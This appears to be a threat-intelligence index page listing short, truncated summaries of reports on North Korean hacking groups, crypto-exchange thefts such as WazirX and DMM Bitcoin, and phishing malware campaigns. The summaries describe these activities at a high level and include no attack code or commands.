654 reports
This includes using smartphones, laptops, and tablets from well-known international brands. These activities demonstrate North Koreans' growing operational security awareness and highlight the regime's ability to acquire foreign technology, potentially un…
Elliptic assesses that hackers affiliated with North Korea stole about $235 million in cryptoassets from Indian exchange WazirX. The stolen assets included more than 200 tokens, with large amounts of Shiba Inu, Ether, Matic, and Pepe. Elliptic observed th…
WazirX reported a cyber attack against one multisig wallet that caused losses exceeding $230 million. The wallet used Liminal’s custody and wallet infrastructure and required approvals from three WazirX signatories plus Liminal, with whitelisted destinati…
The source traces the $230 million-plus WazirX hack from the exploiter address through test transactions, Tornado Cash withdrawals, and related funding paths. It identifies 0x6eedf92fb92dd68a270c3205e96dccc527728066 as the starting theft address, notes Ju…
Please complete the security check to access Why do I have to complete a CAPTCHA? If you are on a personal connection, like at home, you can run an anti-virus scan on your device to make sure it is not infected with malware. Completing the CAPTCHA proves …
Daily NK assesses that the June 2024 DPRK-Russia strategic partnership treaty could create a legal and diplomatic framework for closer cyber cooperation between Pyongyang and Moscow. The article points to treaty language on information security, science a…
The Korean source attributes a malicious Windows shortcut disguised as an employment application document to Kimsuky. The LNK launches obfuscated PowerShell with execution-policy bypass, decodes embedded Base64 script content, searches for matching shortc…
Rapid7 details Kimsuky phishing operations tied to North Korea’s Reconnaissance General Bureau, with targeting against government, research, academic, and think-tank organizations aligned with DPRK strategic interests. The group builds trust through multi…
Example: Light Fury (@Gary Lee) is a DPRK IT worker who transferred $300K+ from his public ENS address to Kim Sang Man who is on the OFAC sanctions list. DPRK IT workers are typically easy to spot and are not the smartest individuals. 0x9b9 was funded by …
Validin used historic DNS, host-response data, and certificate pivots to expand from roomconnect[.]online into additional infrastructure assessed as Lazarus Group-related. The research focused on meeting-themed domains, wildcarded subdomains, shared IP re…
Objective-See analyzed a malicious macOS disk image, MiroTalk.dmg, distributed from a cloned Miro Talk site and tied in the source to North Korean activity and Palo Alto Networks Unit 42’s job-themed campaign reporting. The unsigned app contained a Qt/QMa…
Dark Atlas analyzed Kimsuky's TrollAgent stealer campaign against South Korean targets, with samples compiled in late 2023 and activity tracked from January 2024. The installer used digital signatures from SGA Solutions and D2innovation, dropped a Go-base…
More than $35 million from the $305 million DMM Bitcoin hack was reported laundered through the Huione Guarantee marketplace in July 2024. The excerpt says Lazarus Group is suspected because of laundering similarities and off-chain indicators, but it does…
Konni activity against South Korean targets used spear-phishing lures and LNK files to start a compiled AutoIt payload with low detection coverage, according to the archived source. The reporting highlights compromised-site payload hosting, Korean RTP eng…
CoinStats attributed its June 22, 2024 wallet breach to Lazarus Group or a related nation-state-level organization after reviewing evidence with law enforcement and security researchers. The attacker gained unauthorized access across CoinStats infrastruct…